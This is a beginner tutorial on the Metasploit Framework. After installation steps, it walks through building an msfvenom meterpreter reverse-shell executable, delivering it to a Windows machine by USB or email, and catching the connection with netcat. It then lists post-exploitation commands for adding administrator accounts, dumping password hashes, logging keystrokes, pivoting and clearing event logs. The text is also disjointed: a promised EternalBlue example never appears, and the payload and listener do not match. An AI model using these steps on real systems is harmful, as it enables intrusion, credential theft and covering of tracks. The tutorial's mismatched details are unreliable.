What is Metasploit Framework?

The Metasploit Framework is an open-source penetration testing platform that allows security professionals and ethical hackers to find, exploit, and validate vulnerabilities in systems. It provides the tools needed to discover weaknesses, gain access to systems, and create reports that help in improving security measures.

Key Features:

• Exploit Modules: Pre-built scripts for exploiting known vulnerabilities.
• Payloads: Code that runs after an exploit successfully compromises a system, like creating a reverse shell or uploading malware.
• Auxiliary Modules: Tools for scanning, sniffing, and other actions that don’t exploit a vulnerability.
• Post-Exploitation: Actions taken after a system has been compromised, such as privilege escalation, network pivoting, and data extraction.
• Encoders: Tools to evade security mechanisms, like anti-virus programs.

Example: Exploiting a Vulnerability in Windows SMB

Let’s take the famous EternalBlue (MS17-010) exploit as an example, which targets a vulnerability in the Windows SMB service.

Steps:

Installation Process

On Linux (Kali Linux is preferred):

1. Update your system:

   sudo apt-get update && sudo apt-get upgrade

2. Install Metasploit using the package manager:

   sudo apt-get install metasploit-framework

3. Verify the installation:

   msfconsole

This command should start the Metasploit console.

On Windows:

1. Download the Metasploit installer:

• Go to the Rapid7 official download page and download the Windows installer.

1. Run the installer:

• Double-click the installer and follow the on-screen instructions.

1. Start Metasploit:

• Open the command prompt or search for “Metasploit” in your start menu.

1. Run the msfconsole:

   msfconsole

On macOS:

1. Install Homebrew if you haven’t already:

   /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

2. Install Metasploit:

   brew install metasploit

3. Start Metasploit:

   msfconsole

Here’s a step-by-step guide to performing a reverse shell on a Windows machine, explained in the simplest way possible.

What You Need

1. Your Computer (Attacker’s Machine): A computer with Linux (like Kali Linux) installed.
2. Target Computer (Victim’s Machine): A Windows computer that you have permission to test on.
3. Basic Knowledge: Know how to open a terminal and type commands.

What is a Reverse Shell?

A reverse shell is when the target computer (Windows) connects back to your computer (Linux), allowing you to control the target computer remotely.

Step 1: Set Up a Listener on Your Computer

1. Open Terminal:

• On your Linux computer, find and open the terminal. This is where you’ll type commands.

1. Start a Listener:

• Type the following command to start a listener that waits for a connection from the Windows computer:

   nc -lvnp 4444

• What This Does:
  • nc is a tool called Netcat.
  • -l means “listen” for connections.
  • -v makes it show more information (verbose).
  • -n tells it not to try to look up names for IP addresses.
  • -p 4444 means listen on port 4444 (a specific communication channel).
  Now, your computer is waiting for the Windows computer to connect.

Step 2: Create a Payload (the Program That Will Run on the Windows Computer)

1. Use Metasploit:

• Open another terminal window on your Linux computer and type:

   msfconsole

• This opens Metasploit, a tool used to create and manage attacks.

1. Create the Payload:

• In Metasploit, type the following command to create a small program (payload) that will run on the Windows computer:

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP_Address> LPORT=4444 -f exe -o reverse_shell.exe

• What This Does:
  • msfvenom is a tool in Metasploit that creates payloads.
  • -p windows/meterpreter/reverse_tcp tells it to make a reverse shell for Windows.
  • LHOST=<Your_IP_Address> should be replaced with your Linux computer’s IP address.
  • LPORT=4444 is the port you’re listening on.
  • -f exe makes it a Windows executable file.
  • -o reverse_shell.exe saves it as reverse_shell.exe.
  Now you have a program called reverse_shell.exe that will make the Windows computer connect back to you.

Step 3: Move the Payload to the Target Computer

1. Copy the File:

• Get the reverse_shell.exe file to the Windows computer. This could be done by:
  • Copying it using a USB drive.
  • Sending it through email or any other method.

Important: Only do this on a computer you have permission to test on.

Step 4: Run the Payload on the Target Computer

1. Run the Program:

• On the Windows computer, double-click the reverse_shell.exe file. What Happens:
• The Windows computer will now connect back to your Linux computer, giving you control over it.

Step 5: Control the Target Computer

1. Check Your Listener:

• Go back to the terminal where you started the listener (nc -lvnp 4444). What You’ll See:
• A connection from the Windows computer, and a prompt where you can type commands.

1. Run Commands:

• You can now type commands in this terminal, and they will run on the Windows computer.
• For example, type:

   whoami

• This will tell you the username of the person logged into the Windows computer.

Step 6: Clean Up

1. Close the Connection:

• Type exit in the terminal to close the connection.

1. Delete the File:

• On the Windows computer, delete the reverse_shell.exe file to remove traces of the test.

After you’ve established a reverse shell connection, you can use various commands to interact with the target system. Here are some commonly used commands:

Basic Windows Commands

1. Check the Current User:

   whoami

• Displays the name of the current user.

1. List Files and Directories:

   dir

• Lists all files and directories in the current directory.

1. Change Directory:

   cd <directory_name>

• Changes the current directory to the specified directory.

1. Get Current Directory Path:

   echo %cd%

• Displays the current directory path.

1. Display the IP Configuration:

   ipconfig

• Shows network configuration details such as IP address, subnet mask, and gateway.

1. List Running Processes:

   tasklist

• Lists all currently running processes on the system.

1. Kill a Process:

   taskkill /PID <process_id> /F

• Kills a process by its process ID (PID). The /F flag forces the process to terminate.

1. Create a New User:

   net user <username> <password> /add

• Adds a new user with the specified username and password.

1. Add User to the Administrators Group:

   net localgroup administrators <username> /add

• Adds the specified user to the administrators group.

1. View the System Information:systeminfo
   • Displays detailed information about the system, including OS version, architecture, and more.
2. Open the Command Prompt:
   bash cmd.exe
   • Launches a new instance of the command prompt.

Advanced Commands with Meterpreter

If you used a Meterpreter payload, you have access to advanced commands:

1. Get System Information:

   sysinfo

• Displays information about the target system.

1. Search for Files:

   search -f <filename>

• Searches for files matching the specified name.

1. Dump Password Hashes:

   hashdump

• Dumps the password hashes from the target system.

1. Capture a Screenshot:

   screenshot

• Captures a screenshot of the target system’s desktop.

1. Record Keystrokes:

   keyscan_start

• Starts capturing keystrokes.

   keyscan_dump

• Dumps the captured keystrokes.

1. Download a File:

   download <remote_path> <local_path>

• Downloads a file from the target system to your local machine.

1. Upload a File:

   upload <local_path> <remote_path>

• Uploads a file from your local machine to the target system.

1. Get a Shell:

   shell

• Drops into a standard shell on the target system.

1. Pivot to Another Network:

   route add <subnet> <netmask> <gateway>

• Adds a route to pivot through the target machine to reach other networks.

1. Clear Event Logs:bash clearev
   • Clears the event logs on the target machine to cover tracks.

Exiting the Shell

• Exit the Shell:

  exit

• Closes the shell session.
• Background the Session (Meterpreter):

  background

• Backgrounds the current Meterpreter session, allowing you to interact with Metasploit.

These commands help you interact with and control the target system once you’ve established a reverse shell connection. Always ensure you’re using these commands in an ethical and legal manner.